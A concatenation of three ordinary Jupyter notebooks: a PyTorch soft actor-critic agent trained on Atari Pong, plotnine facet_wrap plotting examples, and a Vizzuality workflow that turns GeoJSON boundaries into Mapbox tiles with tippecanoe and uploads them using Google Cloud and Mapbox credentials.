import torch.nn as nn
import torch.optim as optim
from torch.distributions import Categorical
import torch.nn.functional as F
from torch.utils.tensorboard import SummaryWriter
import gym
import random
import numpy as np
from itertools import count
import matplotlib.pyplot as plt
from collections import namedtuple, deque
import time
import os
import sys
sys.path.append('../')
from utils.wrappers import make_atari, wrap_deepmind, wrap_pytorch
%matplotlib inline
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
class ReplayBuffer:
def __init__(self, state_dims, buffer_size, batch_size):
self.state = np.zeros((buffer_size, state_dims[0], state_dims[1], state_dims[2]), dtype=np.float32)
self.action = np.zeros(buffer_size, dtype=np.float32)
self.next_state = np.zeros((buffer_size, state_dims[0], state_dims[1], state_dims[2]), dtype=np.float32)
self.reward = np.zeros(buffer_size, dtype=np.float32)
self.done = np.zeros(buffer_size, dtype=np.float32)
self.batch_size = batch_size
self.buffer_size = buffer_size
self.size, self.current_index = 0, 0
def store(self, state, action, next_state, reward, done):
self.state[self.current_index] = state
self.action[self.current_index] = action
self.next_state[self.current_index] = next_state
self.reward[self.current_index] = reward
self.done[self.current_index] = done
self.current_index = (self.current_index + 1) % self.buffer_size
self.size = min((self.size + 1), self.buffer_size)
def sample(self):
idx = np.random.choice(self.size, self.batch_size)
return dict(state = torch.FloatTensor(self.state[idx]).to(device),
action = torch.LongTensor(self.action[idx]).unsqueeze(1).to(device),
next_state = torch.FloatTensor(self.next_state[idx]).to(device),
reward = torch.FloatTensor(self.reward[idx]).unsqueeze(1).to(device),
done = torch.FloatTensor(self.done[idx]).unsqueeze(1).to(device))
def __len__(self):
return self.size
def weights_init_(m):
if isinstance(m, nn.Linear):
# 使用 std = $$\text{std} = \text{gain} \times \sqrt{\frac{2}{\text{fan\_in} + \text{fan\_out}}}$$
# 来代替高斯分布(0, std ^ 2)的std
torch.nn.init.xavier_uniform_(m.weight, gain=1)
if m.bias is not None:
torch.nn.init.constant_(m.bias, 0)
# self.common_layer = nn.Sequential(
# nn.Conv2d(state_dims[0], 32, kernel_size=5, stride=1, padding=2),
# nn.MaxPool2d(2),
# nn.ReLU(),
# nn.Conv2d(32, 32, kernel_size=5, stride=1, padding=1),
# nn.MaxPool2d(2),
# nn.ReLU(),
# nn.Conv2d(32, 64, kernel_size=4, stride=1, padding=1),
# nn.MaxPool2d(2),
# nn.ReLU(),
# nn.Conv2d(64, 64, kernel_size=3, stride=1),
# nn.MaxPool2d(2),
# nn.ReLU()
# )
# EDIT 1
class Critic(nn.Module):
def __init__(self, state_dims, action_dim, hidden_dim=512):
super(Critic, self).__init__()
self.common_layer = nn.Sequential(
nn.Conv2d(state_dims[0], 32, kernel_size=8, stride=4),
nn.BatchNorm2d(32),
nn.ReLU(),
nn.Conv2d(32, 64, kernel_size=4, stride=2),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 64, kernel_size=3, stride=1),
nn.BatchNorm2d(64),
nn.ReLU()
)
self.linear1 = nn.Linear(7 * 7 * 64, hidden_dim)
self.linear2 = nn.Linear(hidden_dim, action_dim)
self.apply(weights_init_)
def forward(self, state):
common = self.common_layer(state)
common = common.view(common.size(0), -1)
linear = F.relu(self.linear1(common))
value = self.linear2(linear)
return value
# EDIT 2
class Actor(nn.Module):
def __init__(self, state_dims, action_dim, hidden_dim=512):
super(Actor, self).__init__()
self.common_layer = nn.Sequential(
nn.Conv2d(state_dims[0], 32, kernel_size=8, stride=4),\
nn.BatchNorm2d(32),
nn.ReLU(),
nn.Conv2d(32, 64, kernel_size=4, stride=2),
nn.BatchNorm2d(64),
nn.ReLU(),
nn.Conv2d(64, 64, kernel_size=3, stride=1),
nn.BatchNorm2d(64),
nn.ReLU()
)
self.linear1 = nn.Linear(7 * 7 * 64, hidden_dim)
self.linear2 = nn.Linear(hidden_dim, action_dim)
self.apply(weights_init_)
def forward(self, state):
common = self.common_layer(state)
common = common.view(common.size(0), -1)
linear = F.relu(self.linear1(common))
action_probs = F.softmax(self.linear2(linear), dim=1)
max_action_prob = torch.argmax(action_probs, dim=1)
dist = Categorical(action_probs)
action = dist.sample()
action_log_prob = dist.logits
return action.unsqueeze(1), action_probs, action_log_prob
def take_action(state, timesteps):
if start_steps > timesteps:
action = env.action_space.sample()
else:
state = torch.FloatTensor(state).unsqueeze(0).to(device)
with torch.no_grad():
action, _, _ = actor(state)
action = action.item()
return action
## hyperparameters
env_name = "PongNoFrameskip-v4"
start_steps = 10000
# env_name = "Breakout-v0"
# start_steps = 500
env = make_atari(env_name)
env = wrap_deepmind(env)
env = wrap_pytorch(env)
algorithm_id = "soft_actor_critic_discrete_image"
buffer_size = int(1e6)
batch_size = 64
episodes = 10000
learning_rate = 1e-5
gamma = 0.99
soft_tau = 5e-3
actor_update = 2
automatic_entropy_tuning = True
## hyperparameters
current_time = time.strftime('%Y-%m-%d_%H:%M:%S',time.localtime(time.time()))
ROOT_DIR = "../running_log/{}/{}/{}".format(algorithm_id, env_name, current_time)
model_dir = os.path.join(ROOT_DIR, "model")
plot_dir = os.path.join(ROOT_DIR, "tensorboard")
os.makedirs(model_dir)
os.makedirs(plot_dir)
writer = SummaryWriter(plot_dir, comment="learning_rate={}-batch_size={}-start_steps={}"
.format(learning_rate , batch_size, start_steps))
# env = gym.make(env_name)
# state_dim = env.observation_space.shape[0]
state_dims = env.observation_space.shape
action_dim = env.action_space.n
critic_1 = Critic(state_dims, action_dim).to(device)
critic_2 = Critic(state_dims, action_dim).to(device)
target_critic_1 = Critic(state_dims, action_dim).to(device)
target_critic_2 = Critic(state_dims, action_dim).to(device)
actor = Actor(state_dims, action_dim).to(device)
target_critic_1.load_state_dict(critic_1.state_dict())
target_critic_2.load_state_dict(critic_2.state_dict())
critic_optimizer_1 = optim.Adam(critic_1.parameters(), lr=learning_rate)
critic_optimizer_2 = optim.Adam(critic_2.parameters(), lr=learning_rate)
actor_optimizer = optim.Adam(actor.parameters(), lr=learning_rate)
buffer = ReplayBuffer(state_dims, buffer_size, batch_size)
# torch.prod()
# Returns the product of all elements in the :attr:`input` tensor
# 返回输入张量中所有元素的乘积(可指定维度)
if automatic_entropy_tuning:
# target_entropy = - torch.prod(torch.Tensor(env.action_space.shape).to(device)).item() # -4.0
target_entropy = - 1.0
log_alpha = torch.zeros(1, requires_grad=True, device=device) # tensor([0.], device='cuda:0', requires_grad=True)
alpha = log_alpha.exp()
alpha_optim = optim.Adam([log_alpha], lr=learning_rate)
def sac_train(updates, steps_):
global alpha
for i in range(steps_):
samples = buffer.sample()
state, action, next_state = samples["state"], samples["action"], samples["next_state"]
reward, done = samples["reward"], samples["done"]
# update critic
with torch.no_grad():
# EDIT 3
next_action, _, next_action_log_probs = actor(next_state)
next_action_log_probs = next_action_log_probs.gather(1, next_action.long())
target_Q_1 = target_critic_1(next_state).gather(1, next_action.long())
target_Q_2 = target_critic_2(next_state).gather(1, next_action.long())
Q_target_next = torch.min(target_Q_1, target_Q_2) - alpha * next_action_log_probs
next_q_value = reward + (1.0 - done) * gamma * Q_target_next
Q_1 = critic_1(state).gather(1, action)
Q_2 = critic_2(state).gather(1, action)
critic_loss_1 = F.mse_loss(next_q_value, Q_1)
critic_loss_2 = F.mse_loss(next_q_value, Q_2)
critic_optimizer_1.zero_grad()
critic_loss_1.backward()
critic_optimizer_1.step()
critic_optimizer_2.zero_grad()
critic_loss_2.backward()
critic_optimizer_2.step()
# update actor
# EDIT 5
if i % actor_update == 0:
actions, action_probs, action_log_probs = actor(state)
min_Q_value = torch.min(critic_1(state), critic_2(state))
actor_loss = (alpha * action_log_probs - min_Q_value) * action_probs
actor_loss = torch.sum(actor_loss, dim=1, keepdim=True).mean()
actor_optimizer.zero_grad()
actor_loss.backward()
actor_optimizer.step()
# update entropy_tuning
if automatic_entropy_tuning:
# EDIT 4
action_log_probs = action_log_probs.gather(1, actions.long())
alpha_loss = - log_alpha * (action_log_probs.detach() + target_entropy)
alpha_loss = alpha_loss.mean()
alpha_optim.zero_grad()
alpha_loss.backward()
alpha_optim.step()
alpha = log_alpha.exp()
# update parameter
for target_param, param in zip(target_critic_1.parameters(), critic_1.parameters()):
target_param.data.copy_(target_param.data*(1.0-soft_tau) + param.data * soft_tau)
for target_param, param in zip(target_critic_2.parameters(), critic_2.parameters()):
target_param.data.copy_(target_param.data*(1.0-soft_tau) + param.data * soft_tau)
writer.add_scalars("Loss/Critic", {"critic_1":critic_loss_1,
"critic_2":critic_loss_2}, updates)
writer.add_scalar("Loss/Actor", actor_loss, updates)
writer.add_scalar("Loss/Alpha", alpha_loss, updates)
updates, timesteps, done_time = 0, 0, 0
for episode in range(episodes):
state = env.reset()
episode_reward = 0
for i in count():
timesteps += 1
action = take_action(state, timesteps)
next_state, reward, done, _ = env.step(action)
buffer.store(state, action, next_state, reward, done)
state = next_state
episode_reward += reward
if done:
if len(buffer) > batch_size:
sac_train(updates, i+1)
updates += 1
writer.add_scalar("Episode_step", i, done_time)
done_time += 1
break
writer.add_scalar("Reward", episode_reward, episode)
torch.save(actor, model_dir + "/actor_model.pth")
###Output
_____no_output_____ |
demo_plot/plotnine-examples/examples/facet_wrap.ipynb | ###Markdown
Facet wrap`facet_wrap()` creates a collection of plots (facets), where each plot is differentiated by the faceting variable. These plots are wrapped into a certain number of columns or rows as specified by the user.
###Code
mpg.head()
###Output
_____no_output_____
###Markdown
Basic scatter plot:
###Code
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
Facet a discrete variable using `facet_wrap()`:
###Code
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class')
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
Control the number of rows and columns with the options `nrow` and `ncol`:
###Code
# Selecting the number of columns to display
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class',
ncol = 4 # change the number of columns
)
+ labs(x='displacement', y='horsepower')
)
# Selecting the number of rows to display
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class',
nrow = 4 # change the number of columns
)
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
To change the plot order of the facets, reorder the levels of the faceting variable in the data.
###Code
# re-order categories
mpg['class'] = mpg['class'].cat.reorder_categories(['pickup', 'suv','minivan','midsize','compact','subcompact','2seater'])
# facet plot with reorded drv category
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class')
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
Ordinarily the facets are arranged horizontally (left-to-right from top to bottom). However if you would prefer a vertical layout (facets are arranged top-to-bottom, from left to right) use the `dir` option:
###Code
# Facet plot with vertical layout
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class'
, dir = 'v' # change to a vertical layout
)
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
You can choose if the scale of x- and y-axes are fixed or variable. Set the `scales` argument to `free-y`, `free_x` or `free` for a free scales on the y-axis, x-axis or both axes respectively. You may need to add spacing between the facets to ensure axis ticks and values are easy to read.A fixed scale is the default and does not need to be specified.
###Code
# facet plot with free scales
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class'
, scales = 'free_y' # set scales so y-scale varies with the data
)
+ theme(subplots_adjust={'wspace': 0.25}) # add spaceing between facets to make y-axis ticks visible
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
You can add additional information to your facet labels, by using the `labeller` argument within the `facet_wrap()` command. Below we use `labeller = 'label_both'` to include the column name in the facet label.
###Code
# facet plot with labeller
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('class', labeller = 'label_both')
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____
###Markdown
You can add two discrete variables to a facet:
###Code
# add additional column for plotting exercise
mpg["transmission"] = mpg['trans'].map(lambda x: "auto" if "auto" in x else "man" if "man" in x else "")
# inspect new column transmission which identifies cars as having an automatic or manual transmission
mpg.head()
# facet plot with two variables on one facet
(
ggplot(mpg, aes(x='displ', y='hwy'))
+ geom_point()
+ facet_wrap('~ class + transmission') # use ~ + to add additional faceting variables
+ labs(x='displacement', y='horsepower')
)
###Output
_____no_output_____ |
prepare_boundaries_for_mapbox.ipynb | ###Markdown
Prepare data for the Soils Revealed projecthttps://github.com/Vizzuality/soils-revealed-data`Edward P. Morris (vizzuality.)` DescriptionThis notebook transforms vector boundaries into MapBox tiles format (MBTILES) using tippecanoe and uploads the resulting tiles to MapBox.```MIT LicenseCopyright (c) 2020 VizzualityPermission is hereby granted, free of charge, to any person obtaining a copyof this software and associated documentation files (the "Software"), to dealin the Software without restriction, including without limitation the rightsto use, copy, modify, merge, publish, distribute, sublicense, and/or sellcopies of the Software, and to permit persons to whom the Software isfurnished to do so, subject to the following conditions:The above copyright notice and this permission notice shall be included in allcopies or substantial portions of the Software.THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS ORIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THEAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHERLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THESOFTWARE.``` Setup Linux dependencies
###Code
%%bash
# Install AWS CLI (for MapBox uploads)
apt install --no-install-recommends -y -q awscli
%%bash
# Install tippecanoe (for MapBox mbtiles)
apt install --no-install-recommends -q -y build-essential libsqlite3-dev zlib1g-dev
make
make install
add-apt-repository -y ppa:ubuntu-toolchain-r/test
apt update -q -y
apt install --no-install-recommends -q -y g++-5
export CXX=g++-5
git clone https://github.com/mapbox/tippecanoe.git
cd tippecanoe
make -j
make install
!tippecanoe -h
###Output
tippecanoe: invalid option -- 'h'
Usage: tippecanoe [options] [file.json ...]
Output tileset
--output=output.mbtiles [--output-to-directory=...] [--force]
[--allow-existing]
Tileset description and attribution
[--name=...] [--attribution=...] [--description=...]
Input files and layer names
[--layer=...] [--named-layer=...]
Parallel processing of input
[--read-parallel]
Projection of input
[--projection=...]
Zoom levels
[--maximum-zoom=...] [--minimum-zoom=...]
[--extend-zooms-if-still-dropping] [--one-tile=...]
Tile resolution
[--full-detail=...] [--low-detail=...] [--minimum-detail=...]
Filtering feature attributes
[--exclude=...] [--include=...] [--exclude-all]
Modifying feature attributes
[--attribute-type=...] [--attribute-description=...]
[--accumulate-attribute=...] [--empty-csv-columns-are-null]
[--convert-stringified-ids-to-numbers]
[--use-attribute-for-id=...]
Filtering features by attributes
[--feature-filter-file=...] [--feature-filter=...]
Dropping a fixed fraction of features by zoom level
[--drop-rate=...] [--base-zoom=...] [--drop-lines]
[--drop-polygons] [--cluster-distance=...]
Dropping or merging a fraction of features to keep under tile size limits
[--drop-densest-as-needed] [--drop-fraction-as-needed]
[--drop-smallest-as-needed] [--coalesce-densest-as-needed]
[--coalesce-fraction-as-needed]
[--coalesce-smallest-as-needed] [--force-feature-limit]
[--cluster-densest-as-needed]
Dropping tightly overlapping features
[--gamma=...] [--increase-gamma-as-needed]
Line and polygon simplification
[--simplification=...] [--no-line-simplification]
[--simplify-only-low-zooms] [--no-tiny-polygon-reduction]
[--no-simplification-of-shared-nodes]
Attempts to improve shared polygon boundaries
[--detect-shared-borders] [--grid-low-zooms]
Controlling clipping to tile boundaries
[--buffer=...] [--no-clipping] [--no-duplication]
Reordering features within each tile
[--preserve-input-order] [--reorder] [--coalesce]
[--reverse] [--hilbert]
Adding calculated attributes
[--calculate-feature-density] [--generate-ids]
Trying to correct bad source geometry
[--detect-longitude-wraparound] [--use-source-polygon-winding]
[--reverse-source-polygon-winding] [--clip-bounding-box=...]
Filtering tile contents
[--prefilter=...] [--postfilter=...]
Setting or disabling tile size limits
[--maximum-tile-bytes=...] [--maximum-tile-features=...]
[--no-feature-limit] [--no-tile-size-limit]
[--no-tile-compression] [--no-tile-stats]
[--tile-stats-attributes-limit=...]
[--tile-stats-sample-values-limit=...] [--tile-stats-values-limit=...]
Temporary storage
[--temporary-directory=...]
Progress indicator
[--quiet] [--no-progress-indicator] [--progress-interval=...]
[--version]
###Markdown
Python packages
###Code
%%bash
# Install mapbox python package
pip install mapbox
!pip list
###Output
Package Version
------------------------ ---------------
absl-py 0.9.0
alabaster 0.7.12
albumentations 0.1.12
altair 4.1.0
asgiref 3.2.7
astor 0.8.1
astropy 4.0.1.post1
astunparse 1.6.3
atari-py 0.2.6
atomicwrites 1.3.0
attrs 19.3.0
audioread 2.1.8
autograd 1.3
awscli 1.14.44
Babel 2.8.0
backcall 0.1.0
beautifulsoup4 4.6.3
bleach 3.1.4
blis 0.4.1
bokeh 1.4.0
boto 2.49.0
boto3 1.12.39
botocore 1.15.39
Bottleneck 1.3.2
branca 0.4.0
bs4 0.0.1
CacheControl 0.12.6
cachetools 3.1.1
catalogue 1.0.0
certifi 2020.4.5.1
cffi 1.14.0
chainer 6.5.0
chardet 3.0.4
click 7.1.1
cloudpickle 1.3.0
cmake 3.12.0
cmdstanpy 0.4.0
colorama 0.3.7
colorlover 0.3.0
community 1.0.0b1
contextlib2 0.5.5
convertdate 2.2.0
coverage 3.7.1
coveralls 0.5
crcmod 1.7
cufflinks 0.17.3
cvxopt 1.2.4
cvxpy 1.0.31
cycler 0.10.0
cymem 2.0.3
Cython 0.29.16
daft 0.0.4
dask 2.12.0
dataclasses 0.7
datascience 0.10.6
decorator 4.4.2
defusedxml 0.6.0
descartes 1.1.0
dill 0.3.1.1
distributed 1.25.3
Django 3.0.5
dlib 19.18.0
docopt 0.6.2
docutils 0.15.2
dopamine-rl 1.0.5
earthengine-api 0.1.217
easydict 1.9
ecos 2.0.7.post1
editdistance 0.5.3
en-core-web-sm 2.2.5
entrypoints 0.3
ephem 3.7.7.1
et-xmlfile 1.0.1
fa2 0.3.5
fancyimpute 0.4.3
fastai 1.0.60
fastdtw 0.3.4
fastprogress 0.2.3
fastrlock 0.4
fbprophet 0.6
feather-format 0.4.0
featuretools 0.4.1
filelock 3.0.12
firebase-admin 4.0.1
fix-yahoo-finance 0.0.22
Flask 1.1.2
folium 0.8.3
fsspec 0.7.2
future 0.16.0
gast 0.3.3
GDAL 2.2.2
gdown 3.6.4
gensim 3.6.0
geographiclib 1.50
geopy 1.17.0
gin-config 0.3.0
glob2 0.7
google 2.0.3
google-api-core 1.16.0
google-api-python-client 1.7.12
google-auth 1.7.2
google-auth-httplib2 0.0.3
google-auth-oauthlib 0.4.1
google-cloud-bigquery 1.21.0
google-cloud-core 1.0.3
google-cloud-datastore 1.8.0
google-cloud-firestore 1.6.2
google-cloud-language 1.2.0
google-cloud-storage 1.18.1
google-cloud-translate 1.5.0
google-colab 1.0.0
google-pasta 0.2.0
google-resumable-media 0.4.1
googleapis-common-protos 1.51.0
googledrivedownloader 0.4
graphviz 0.10.1
grpcio 1.28.1
gspread 3.0.1
gspread-dataframe 3.0.5
gym 0.17.1
h5py 2.10.0
HeapDict 1.0.1
holidays 0.9.12
html5lib 1.0.1
httpimport 0.5.18
httplib2 0.17.2
httplib2shim 0.0.3
humanize 0.5.1
hyperopt 0.1.2
ideep4py 2.0.0.post3
idna 2.8
image 1.5.30
imageio 2.4.1
imagesize 1.2.0
imbalanced-learn 0.4.3
imblearn 0.0
imgaug 0.2.9
importlib-metadata 1.6.0
imutils 0.5.3
inflect 2.1.0
intel-openmp 2020.0.133
intervaltree 2.1.0
ipykernel 4.10.1
ipython 5.5.0
ipython-genutils 0.2.0
ipython-sql 0.3.9
ipywidgets 7.5.1
iso3166 1.0.1
itsdangerous 1.1.0
jax 0.1.62
jaxlib 0.1.42
jdcal 1.4.1
jedi 0.17.0
jieba 0.42.1
Jinja2 2.11.2
jmespath 0.9.5
joblib 0.14.1
jpeg4py 0.1.4
jsonschema 2.6.0
jupyter 1.0.0
jupyter-client 5.3.4
jupyter-console 5.2.0
jupyter-core 4.6.3
kaggle 1.5.6
kapre 0.1.3.1
Keras 2.3.1
Keras-Applications 1.0.8
Keras-Preprocessing 1.1.0
keras-vis 0.4.1
kiwisolver 1.2.0
knnimpute 0.1.0
librosa 0.6.3
lightgbm 2.2.3
llvmlite 0.31.0
lmdb 0.98
lucid 0.3.8
LunarCalendar 0.0.9
lxml 4.2.6
mapbox 0.18.0
Markdown 3.2.1
MarkupSafe 1.1.1
matplotlib 3.2.1
matplotlib-venn 0.11.5
missingno 0.4.2
mistune 0.8.4
mizani 0.6.0
mkl 2019.0
mlxtend 0.14.0
more-itertools 8.2.0
moviepy 0.2.3.5
mpmath 1.1.0
msgpack 1.0.0
multiprocess 0.70.9
multitasking 0.0.9
murmurhash 1.0.2
music21 5.5.0
natsort 5.5.0
nbconvert 5.6.1
nbformat 5.0.5
networkx 2.4
nibabel 3.0.2
nltk 3.2.5
notebook 5.2.2
np-utils 0.5.12.1
numba 0.48.0
numexpr 2.7.1
numpy 1.18.2
nvidia-ml-py3 7.352.0
oauth2client 4.1.3
oauthlib 3.1.0
okgrade 0.4.3
opencv-contrib-python 4.1.2.30
opencv-python 4.1.2.30
openpyxl 2.5.9
opt-einsum 3.2.0
osqp 0.6.1
packaging 20.3
palettable 3.3.0
pandas 1.0.3
pandas-datareader 0.8.1
pandas-gbq 0.11.0
pandas-profiling 1.4.1
pandocfilters 1.4.2
parso 0.7.0
pathlib 1.0.1
patsy 0.5.1
pexpect 4.8.0
pickleshare 0.7.5
Pillow 7.0.0
pip 19.3.1
pip-tools 4.5.1
plac 1.1.3
plotly 4.4.1
plotnine 0.6.0
pluggy 0.7.1
polyline 1.4.0
portpicker 1.3.1
prefetch-generator 1.0.1
preshed 3.0.2
prettytable 0.7.2
progressbar2 3.38.0
prometheus-client 0.7.1
promise 2.3
prompt-toolkit 1.0.18
protobuf 3.10.0
psutil 5.4.8
psycopg2 2.7.6.1
ptvsd 5.0.0a12
ptyprocess 0.6.0
py 1.8.1
pyarrow 0.14.1
pyasn1 0.4.8
pyasn1-modules 0.2.8
pycocotools 2.0.0
pycparser 2.20
pydata-google-auth 0.3.0
pydot 1.3.0
pydot-ng 2.0.0
pydotplus 2.0.2
PyDrive 1.3.1
pyemd 0.5.1
pyglet 1.5.0
Pygments 2.1.3
pygobject 3.26.1
pymc3 3.7
PyMeeus 0.3.7
pymongo 3.10.1
pymystem3 0.2.0
PyOpenGL 3.1.5
pyparsing 2.4.7
pyrsistent 0.16.0
pysndfile 1.3.8
PySocks 1.7.1
pystan 2.19.1.1
pytest 3.6.4
python-apt 1.6.5+ubuntu0.2
python-chess 0.23.11
python-dateutil 2.8.1
python-louvain 0.14
python-slugify 4.0.0
python-utils 2.4.0
pytz 2018.9
PyWavelets 1.1.1
PyYAML 3.13
pyzmq 19.0.0
qtconsole 4.7.2
QtPy 1.9.0
regex 2019.12.20
requests 2.21.0
requests-oauthlib 1.3.0
resampy 0.2.2
retrying 1.3.3
roman 2.0.0
rpy2 3.2.7
rsa 4.0
s3fs 0.4.2
s3transfer 0.3.3
scikit-image 0.16.2
scikit-learn 0.22.2.post1
scipy 1.4.1
screen-resolution-extra 0.0.0
scs 2.1.2
seaborn 0.10.0
Send2Trash 1.5.0
setuptools 46.1.3
setuptools-git 1.2
Shapely 1.7.0
simplegeneric 0.8.1
six 1.12.0
sklearn 0.0
sklearn-pandas 1.8.0
smart-open 1.11.1
snowballstemmer 2.0.0
sortedcontainers 2.1.0
spacy 2.2.4
Sphinx 1.8.5
sphinxcontrib-websupport 1.2.1
SQLAlchemy 1.3.16
sqlparse 0.3.1
srsly 1.0.2
statsmodels 0.10.2
sympy 1.1.1
tables 3.4.4
tabulate 0.8.7
tbb 2020.0.133
tblib 1.6.0
tensorboard 2.2.0
tensorboard-plugin-wit 1.6.0.post3
tensorboardcolab 0.0.22
tensorflow 2.2.0rc3
tensorflow-addons 0.8.3
tensorflow-datasets 2.1.0
tensorflow-estimator 2.2.0rc0
tensorflow-gcs-config 2.1.8
tensorflow-hub 0.8.0
tensorflow-metadata 0.21.2
tensorflow-privacy 0.2.2
tensorflow-probability 0.9.0
termcolor 1.1.0
terminado 0.8.3
testpath 0.4.4
text-unidecode 1.3
textblob 0.15.3
textgenrnn 1.4.1
Theano 1.0.4
thinc 7.4.0
toolz 0.10.0
torch 1.4.0
torchsummary 1.5.1
torchtext 0.3.1
torchvision 0.5.0
tornado 4.5.3
tqdm 4.38.0
traitlets 4.3.3
tweepy 3.6.0
typeguard 2.7.1
typing 3.6.6
typing-extensions 3.6.6
tzlocal 1.5.1
umap-learn 0.4.1
uritemplate 3.0.1
urllib3 1.24.3
vega-datasets 0.8.0
wasabi 0.6.0
wcwidth 0.1.9
webencodings 0.5.1
Werkzeug 1.0.1
wheel 0.34.2
widgetsnbextension 3.5.1
wordcloud 1.5.0
wrapt 1.12.1
xarray 0.15.1
xgboost 0.90
xkit 0.0.0
xlrd 1.1.0
xlwt 1.3.0
yellowbrick 0.9.1
zict 2.0.0
zipp 3.1.0
###Markdown
Authorisation Google cloud storageEither use user authorisation or a service account, save credentials to your drive or upload.
###Code
# For auth WITHOUT service account
#from google.colab import auth
#auth.authenticate_user()
# https://cloud.google.com/resource-manager/docs/creating-managing-projects
#project_id = "soc-platform"
#!gcloud config set project {project_id}
# Mount drive
from google.colab import drive
drive.mount('/content/drive')
# Copy GC credentials to home (place in your GDrive, and connect Drive)
!cp "/content/drive/My Drive/soc-platform-6a9bf204638c.json" "/root/.soc-platform-6a9bf204638c.json"
# Auth WITH service account
!gcloud auth activate-service-account \
[email protected] \
--key-file=/root/.soc-platform-6a9bf204638c.json --project="soc-platform"
# Test GC auth
!gsutil ls "gs://vizz-data-transfer"
###Output
gs://vizz-data-transfer/SOC_maps/
###Markdown
MapBoxCreate a JSON file and add it to your drive or upload:```{"MB_USER:"user-name", "MB_TOKEN":"token"}```
###Code
# Copy GC credentials to home (place in your GDrive, and connect Drive)
!cp "/content/drive/My Drive/copernicus-forests-mapbox.json" "/root/.copernicus-forests-mapbox.json"
# Set up Mapbox (S3) credentials as environmental variables
import json
import os
# Set user and token as environment variables
c = json.loads(open("/root/.copernicus-forests-mapbox.json").read())
os.environ['MB_USER'] = c['MB_USER']
os.environ['MB_TOKEN'] = c['MB_TOKEN']
# Make call to mapbox api and save return to file
!curl -X POST https://api.mapbox.com/uploads/v1/${MB_USER}/credentials?access_token=${MB_TOKEN} > credentials.json
r = json.loads(open("credentials.json").read())
#print(r)
# Set credentials as environ variables
os.environ['MB_BUCKET'] = r['bucket']
os.environ['MB_KEY'] = r['key']
os.environ['AWS_ACCESS_KEY_ID'] = r['accessKeyId']
os.environ['AWS_SECRET_ACCESS_KEY'] = r['secretAccessKey']
os.environ['AWS_SESSION_TOKEN'] = r['sessionToken']
###Output
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 857 100 857 0 0 2158 0 --:--:-- --:--:-- --:--:-- 2158
###Markdown
Utils copy_gcs
###Code
import os
import subprocess
def copy_gcs(source_list, dest_list, opts=""):
"""
Use gsutil to copy each corresponding item in source_list
to dest_list
"""
for s, d in zip(source_list, dest_list):
cmd = f"gsutil -m cp -r {opts} {s} {d}"
print(f"Processing: {cmd}")
r = subprocess.call(cmd, shell=True)
if r == 0:
print("Task created")
else:
print("Task failed")
print("Finished copy")
###Output
_____no_output_____
###Markdown
upload_to_mapbox
###Code
# Upload task for mapbox
import os
from mapbox import Uploader
def upload_to_mapbox(file_path, tileset_name):
"""
Given a local file path and a MapBox tileset name
push to MapBox AWS S3 staging and create MapBox upload task
"""
username = os.getenv("MB_USER")
my_token = os.getenv("MB_TOKEN")
u = Uploader(access_token=my_token) # handles authentication
tileset = f"{username}.{tileset_name}" # name your tileset
job = u.upload(open(file_path, 'rb'), tileset) # upload happens here
# job = u.create(url, tileset, name=tileset_name) # starts the tiling job
status = job.status_code
print(status)
###Output
_____no_output_____
###Markdown
create_mbtiles
###Code
import os
import subprocess
def create_mbtiles(source_path, dest_path, layer_name, opts="-zg --drop-densest-as-needed --extend-zooms-if-still-dropping --force --read-parallel"):
"""
Use tippecanoe to to create a MBTILE at dest_path from source_path.
layer_name is used for the name of the layer in the MBTILE.
Regex file path (/*.geojson) is supported for source_path.
"""
cmd = f"tippecanoe -o {dest_path} -l {layer_name} {opts} {source_path}"
print(f"Processing: {cmd}")
r = subprocess.call(cmd, shell=True)
if r == 0:
print("Task created")
else:
print("Task failed")
print("Finished processing")
###Output
_____no_output_____
###Markdown
Process data Create MBTILES
###Code
layer_name = "SWE_biovar_species"
source_path = "'/content/drive/My Drive/copernicus-forests/SWE_zonal_biovar_ISEA-3-HEXAGON_grid.geojson'"
dest_path = "'/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles'"
create_mbtiles(source_path, dest_path, layer_name, opts="-zg --drop-densest-as-needed --extend-zooms-if-still-dropping --force --read-parallel")
###Output
Processing: tippecanoe -o '/content/drive/My Drive/copernicus-forests/SWE-bv-spp.mbtiles' -l SWE_biovar_species -zg --drop-densest-as-needed --extend-zooms-if-still-dropping --force --read-parallel '/content/drive/My Drive/copernicus-forests/SWE_zonal_biovar_ISEA-3-HEXAGON_grid.geojson'
Task created
Finished processing
###Markdown
Upload to MapBox
###Code
# Add to Mapbox
import glob
import os
path = '/content/drive/My Drive/copernicus-forests/'
files = [f for f in glob.glob(path + "**/*.mbtiles", recursive=True)]
print(files)
for f in files:
print(f)
